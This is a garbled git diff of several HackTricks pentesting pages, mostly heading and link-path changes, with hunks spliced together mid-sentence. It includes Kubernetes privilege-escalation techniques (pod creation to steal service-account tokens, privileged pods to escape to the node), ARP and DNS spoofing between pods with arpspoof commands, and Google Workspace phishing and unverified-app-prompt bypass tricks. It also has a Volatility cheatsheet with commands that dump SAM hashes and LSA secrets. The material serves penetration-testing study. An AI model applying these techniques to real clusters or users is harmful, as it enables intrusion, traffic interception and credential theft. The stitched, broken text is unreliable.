Support HackTricks and get benefits!
@@ -466,5 +464,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,35 +18,34 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,11 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
Here you can find some potentially dangerous Roles and ClusterRoles configurations.\
Remember that you can get all the supported resources with `kubectl api-resources`
-# **Privilege Escalation**
+## **Privilege Escalation**
Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**:
@@ -30,7 +29,7 @@ Referring as the art of getting **access to a different principal** within the c
* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
-## **Access Any Resource or Verb**
+### **Access Any Resource or Verb**
This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a “ClusterRole.” If it’s a “ClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission.
@@ -46,7 +45,7 @@ rules:
verbs: ["*"]
```
-## **Access Any Resource**
+### **Access Any Resource**
Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:
@@ -66,7 +65,7 @@ rules:
verbs: ["create", "list", "get"]
```
-## Pod Create - Steal Token
+### Pod Create - Steal Token
An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**.
@@ -103,7 +102,7 @@ So just create the malicious pod and expect the secrets in port 6666:
.png>)
-## **Pod Create & Escape**
+### **Pod Create & Escape**
The following definition gives all the privileges a container can have:
@@ -168,20 +167,20 @@ Now that you can escape to the node check post-exploitation techniques in:
[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %}
-### Stealth
+#### Stealth
You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
-* [**Privileged + hostPID**](../../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#privileged-+-hostpid)
-* [**Privileged only**](../../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#privileged)
-* [**hostPath**](../../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#arbitrary-mounts)
-* [**hostPID**](../../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#hostpid)
-* [**hostNetwork**](../../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#hostnetwork)
-* [**hostIPC**](../../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#hostipc)
+* [**Privileged + hostPID**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged-+-hostpid)
+* [**Privileged only**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged)
+* [**hostPath**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#arbitrary-mounts)
+* [**hostPID**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostpid)
+* [**hostNetwork**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostnetwork)
+* [**hostIPC**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostipc)
_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)\_\_
-## Pod Create - Move to cloud
+### Pod Create - Move to cloud
If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\
Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance.
@@ -192,7 +191,7 @@ For more information check:
[kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md)
{% endcontent-ref %}
-## **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
+### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
@@ -231,7 +230,7 @@ Kubernetes API documentation indicates that the “**PodTemplateSpec**” endpoi
**So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.**
-## **Pods Exec**
+### **Pods Exec**
**Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. It’s just like creating a SSH session for the container.
@@ -243,7 +242,7 @@ kubectl exec -it Support HackTricks and get benefits!
@@ -664,5 +662,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Introduction
-# Introduction
-
-Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../pentesting/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic.
+Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic.
In the scenario 4 machines are going to be created:
@@ -111,11 +110,11 @@ kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt instal
kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash"
```
-# Basic Kubernetes Networking
+## Basic Kubernetes Networking
If you want more details about the networking topics introduced here, go to the references.
-## ARP
+### ARP
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
@@ -127,7 +126,7 @@ This fact implies that, by default, **every pod running in the same node** is go
Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
{% endhint %}
-## DNS
+### DNS
In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace:
@@ -177,11 +176,11 @@ Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is g
Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
{% endhint %}
-# ARP Spoofing in pods in the same Node
+## ARP Spoofing in pods in the same Node
Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**.
-## Scapy
+### Scapy
```bash
python3 /tmp/arp_spoof.py
@@ -253,20 +252,20 @@ if __name__=="__main__":
```
{% endcode %}
-## ARPSpoof
+### ARPSpoof
```bash
apt install dsniff
arpspoof -t 172.17.0.9 172.17.0.10
```
-# DNS Spoofing
+## DNS Spoofing
As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.
You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/)
-In our scenario, **download** the **tool** in the attacker pod and create a **file named `hosts` ** with the **domains** you want to **spoof** like:
+In our scenario, **download** the **tool** in the attacker pod and create a \*\*file named `hosts` \*\* with the **domains** you want to **spoof** like:
```
cat hosts
@@ -297,12 +296,11 @@ If you try to create your own DNS spoofing script, if you **just modify the the
You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
{% endhint %}
-# References
+## References
* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
-
Support HackTricks and get benefits!
@@ -318,5 +316,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,30 +16,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Workspace Phishing
-# Workspace Phishing
+### Generic Phishing Methodology
-## Generic Phishing Methodology
-
-{% content-ref url="../phishing-methodology/" %}
-[phishing-methodology](../phishing-methodology/)
+{% content-ref url="../generic-methodologies-and-resources/phishing-methodology/" %}
+[phishing-methodology](../generic-methodologies-and-resources/phishing-methodology/)
{% endcontent-ref %}
-## Google Groups Phishing
+### Google Groups Phishing
Apparently by default in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will looks **legit** and people might click on the link.
-## Hangout Phishing
+### Hangout Phishing
You might be able either to directly talk with a person just having his email address or sending an invitation to talk. Either way, modify an email account maybe naming it "Google Security" and adding some Google logos, and the people will think they are talking to google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)
Just the **same technique** can be used with **Google Chat**.
-## Google Doc Phishing
+### Google Doc Phishing
You can create an **apparently legitimate document** and the in a comment **mention some email (like +user@gmail.com)**. Google will **send an email to that email address** notifying that he was mentioned in the document. You can **put a link in that document** to try to make the persona access it.
-## Google Calendar Phishing
+### Google Calendar Phishing
You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event looks legit and **put a comment indicating that they need to read something** (with the **phishing link**).\
To make it looks less suspicious:
@@ -48,17 +47,17 @@ To make it looks less suspicious:
* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
* Apparently using the API you can set to **True** that **people** has **accepted** the event and even create **comments on their behalf**.
-## OAuth Phishing
+### OAuth Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trust** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and from Workspace admins can even prevent people to accept OAuth applications. More on this in the OAuth section.
-# Password Spraying
+## Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) who will use AWS lambdas to change IP address.
-# Oauth Apps
+## Oauth Apps
**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
@@ -67,7 +66,7 @@ When a **user** wants to **use** that **application**, he will be **prompted** t
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. Therefore, in organizations accounts, there are ways to prevent this from happening.
-## Unverified App prompt
+### Unverified App prompt
As it was mentioned, google will always present a **prompt to the user to accept** the permissions he is giving the application on his behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making more difficult** to the user to grant the permissions to the app.
@@ -76,14 +75,14 @@ This prompt appears in apps that:
* Uses any scope that can access to private data (Gmail, Drive, GCP, BigQuery...)
* Apps with less than 100 users (apps > 100 a review process is needed also to not show the unverified prompt)
-## Interesting Scopes
+### Interesting Scopes
You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes.
* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
* **directory.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
-# App Scripts
+## App Scripts
Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt)
@@ -92,7 +91,7 @@ However, even if the app isn't verified there are a couple of ways to not show t
* If the publisher of the app is in the same Workspace as the user accessing it
* If the script is in a drive of the user
-## Copy Document Unverified Prompt Bypass
+### Copy Document Unverified Prompt Bypass
When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.**
@@ -109,7 +108,7 @@ But can be prevented with:
.png>)
-## Shared Document Unverified Prompt Bypass
+### Shared Document Unverified Prompt Bypass
Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
@@ -124,45 +123,45 @@ This also means that if an **App Script already existed** and people has **grant
To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `Support HackTricks and get benefits!
@@ -252,5 +250,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,27 +16,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses
-# eLearnSecurity Mobile Application Penetration Tester (eMAPT) and the respective INE courses
-
-## Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)
+### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)
This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**.
I found the course to be a great one for **people that don't have any experience pentesting Android** applications. However, **if** you are someone with **experience** in the topic and you have access to the course I also recommend you to **take a look to it**. That **was my case** when I did this course and even having a few years of experience pentesting Android applications **this course taught me some Android basics I didn't know and some new tricks**.
Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\
-Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks.
+Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-pentesting/android-app-pentesting/) and learn more tricks.
-## Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)
+### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)
When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\
However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.**
As in the previous course, this course has some very useful labs to practice what you learn, but it doesn't explain every possible vulnerability of iOS applications. However, that's not an issue as **it teach you the basics to be able to understand other iOS vulnerabilities**.\
-Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-apps-pentesting/ios-pentesting/) and learn more tricks.
+Besides, once you have completed the course (or before) you can go to the [**Hacktricks iOS Applications pentesting section**](../mobile-pentesting/ios-pentesting/) and learn more tricks.
-## [eMAPT](https://elearnsecurity.com/product/emapt-certification/)
+### [eMAPT](https://elearnsecurity.com/product/emapt-certification/)
> The eLearnSecurity Mobile Application Penetration Tester (eMAPT) certification is issued to cyber security experts that display advanced mobile application security knowledge through a scenario-based exam.
@@ -48,16 +47,16 @@ Having done the [**INE course about Android applications pentesting**](https://m
In this exam I **missed the opportunity to exploit more vulnerabilities**, however, **I lost a bit the "fear" to write Android applications to exploit a vulnerability**. So it felt just like **another part of the course to complete your knowledge in Android applications pentesting**.
-# eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related
+## eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related
-## Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)
+### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)
-This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
+This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**.\
Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
-## [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
+### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
> The eLearnSecurity Web Application Penetration Tester eXtreme (eWAPTX) is our most advanced web application pentesting certification. The eWPTX exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.
@@ -66,24 +65,24 @@ The exam was composed of a **few web applications full of vulnerabilities**. In
**All the vulnerabilities I reported could be found explained in the** [**Web Application Penetration Testing eXtreme course**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**.** However, order to pass this exam I think that you **don't only need to know about web vulnerabilities**, but you need to be **experienced exploiting them**. So, if you are doing the course, at least practice with the labs and potentially play with other platform where you can improve your skills exploiting web vulnerabilities.
-# Course: **Data Science on the Google Cloud Platform**
+## Course: **Data Science on the Google Cloud Platform**
\
It's a very interesting basic course about **how to use the ML environment provided by Google** using services such as big-query (to store al load results), Google Deep Learning APIs (Google Vision API, Google Speech API, Google Natural Language API and Google Video Intelligence API) and even how to train your own model.
-# Course: **Machine Learning with scikit-learn Starter Pass**
+## Course: **Machine Learning with scikit-learn Starter Pass**
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**.
It's definitely recommended for people that haven't use scikit-learn (but know python)
-# **Course: Classification Algorithms**
+## **Course: Classification Algorithms**
The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
It also shows how to **create models** with with **scikit-learn.**
-# Course: **Decision Trees**
+## Course: **Decision Trees**
The [**Decision Trees course**](https://my.ine.com/DataScience/courses/83fcfd52/decision-trees) was very useful to improve my knowledge about **Decision and Regressions Trees**, **when** are they **useful**, **how** they **work** and how to properly **tune them**.
@@ -91,8 +90,7 @@ It also explains **how to create tree models** with scikit-learn different techn
The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**.
-#
-
+##
@@ -109,5 +107,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md
index b6777cba..e12041fe 100644
--- a/ctf-write-ups/try-hack-me/pickle-rick.md
+++ b/ctf-write-ups/try-hack-me/pickle-rick.md
@@ -1,5 +1,7 @@
# Pickle Rick
+## Pickle Rick
+
Support HackTricks and get benefits!
@@ -16,16 +18,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Container modification
+## Container modification
There are suspicions that some docker container was compromised:
@@ -64,7 +63,7 @@ If you find that **some suspicious file was added** you can access the container
docker exec -it wordpress bash
```
-# Images modifications
+## Images modifications
When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
@@ -81,7 +80,7 @@ Then, you can **decompress** the image and **access the blobs** to search for su
tar -xf image.tar
```
-## Basic Analysis
+### Basic Analysis
You can get **basic information** from the image running:
@@ -102,7 +101,7 @@ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpi
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
-## Dive
+### Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
@@ -125,12 +124,11 @@ tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
-# Credentials from memory
+## Credentials from memory
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
-Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-unix/privilege-escalation/#process-memory).
-
+Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
@@ -147,5 +145,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
index f0682ea0..e5c98039 100644
--- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
+++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md
@@ -1,4 +1,4 @@
-
+# Volatility - CheatSheet
@@ -16,16 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
```bash
python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # Will use most important plugins (could use a lot of space depending on the size of the memory)
```
-# Installation
+## Installation
-## volatility3
+### volatility3
```bash
git clone https://github.com/volatilityfoundation/volatility3.git
@@ -34,7 +33,7 @@ python3 setup.py install
python3 vol.py —h
```
-## volatility2
+### volatility2
{% tabs %}
{% tab title="Method1" %}
@@ -52,11 +51,11 @@ python setup.py install
{% endtab %}
{% endtabs %}
-# Volatility Commands
+## Volatility Commands
Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
-## A note on “list” vs. “scan” plugins
+### A note on “list” vs. “scan” plugins
Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes.
@@ -66,9 +65,9 @@ That makes “list” plugins pretty fast, but just as vulnerable as the Windows
From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
-# OS Profiles
+## OS Profiles
-## Volatility3
+### Volatility3
As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\
Symbol table packs for the various operating systems are available for **download** at:
@@ -77,9 +76,9 @@ Symbol table packs for the various operating systems are available for **downloa
* [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip)
* [https://downloads.volatilityfoundation.org/volatility3/symbols/linux.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/linux.zip)
-## Volatility2
+### Volatility2
-### External Profile
+#### External Profile
You can get the list of supported profiles doing:
@@ -103,20 +102,20 @@ VistaSP0x86 - A Profile for Windows Vista SP0
You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles)
-In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64` , and you can use it executing something like:
+In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64` , and you can use it executing something like:
```bash
./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan
```
-### Discover Profile
+#### Discover Profile
```
volatility imageinfo -f file.dmp
volatility kdbgscan -f file.dmp
```
-### **Differences between imageinfo and kdbgscan**
+#### **Differences between imageinfo and kdbgscan**
As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it (from [here](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)).
@@ -134,11 +133,11 @@ PsActiveProcessHead : 0xfffff800011947f0 (0 processes)
PsLoadedModuleList : 0xfffff80001197ac0 (0 modules)
```
-### KDBG
+#### KDBG
The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGER\_DATA64, or **KDBG** by volatility) is important for many things that Volatility and debuggers do. For example, it has a reference to the PsActiveProcessHead which is the list head of all processes required for process listing.
-# OS Information
+## OS Information
```bash
#vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info)
@@ -147,9 +146,9 @@ The **kernel debugger block** (named KdDebuggerDataBlock of the type \_KDDEBUGGE
The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump.
-# Hashes/Passwords
+## Hashes/Passwords
-Extract SAM hashes, [domain cached credentials](../../../windows/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows/authentication-credentials-uac-and-efs.md#lsa-secrets).
+Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets).
{% tabs %}
{% tab title="vol3" %}
@@ -169,7 +168,7 @@ volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets
{% endtab %}
{% endtabs %}
-# Memory Dump
+## Memory Dump
The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**.
@@ -177,9 +176,9 @@ The memory dump of a process will **extract everything** of the current status o
volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
```
-# Processes
+## Processes
-## List processes
+### List processes
Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\
It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes.
@@ -203,7 +202,7 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list
{% endtab %}
{% endtabs %}
-## Dump proc
+### Dump proc
{% tabs %}
{% tab title="vol3" %}
@@ -219,7 +218,7 @@ volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f fil
{% endtab %}
{% endtabs %}
-## Command line
+### Command line
Anything suspicious was executed?
@@ -240,7 +239,7 @@ volatility --profile=PROFILE consoles -f file.dmp #command history by scanning f
Commands entered into cmd.exe are processed by **conhost.exe** (csrss.exe prior to Windows 7). So even if an attacker managed to **kill the cmd.exe** **prior** to us obtaining a memory **dump**, there is still a good chance of **recovering history** of the command line session from **conhost.exe’s memory**. If you find **something weird** (using the consoles modules), try to **dump** the **memory** of the **conhost.exe associated** process and **search** for **strings** inside it to extract the command lines.
-## Environment
+### Environment
Get the env variables of each running process. There could be some interesting values.
@@ -260,7 +259,7 @@ volatility --profile=PROFILE -f file.dmp linux_psenv [-p Support HackTricks and get benefits!
@@ -805,5 +801,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,13 +18,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
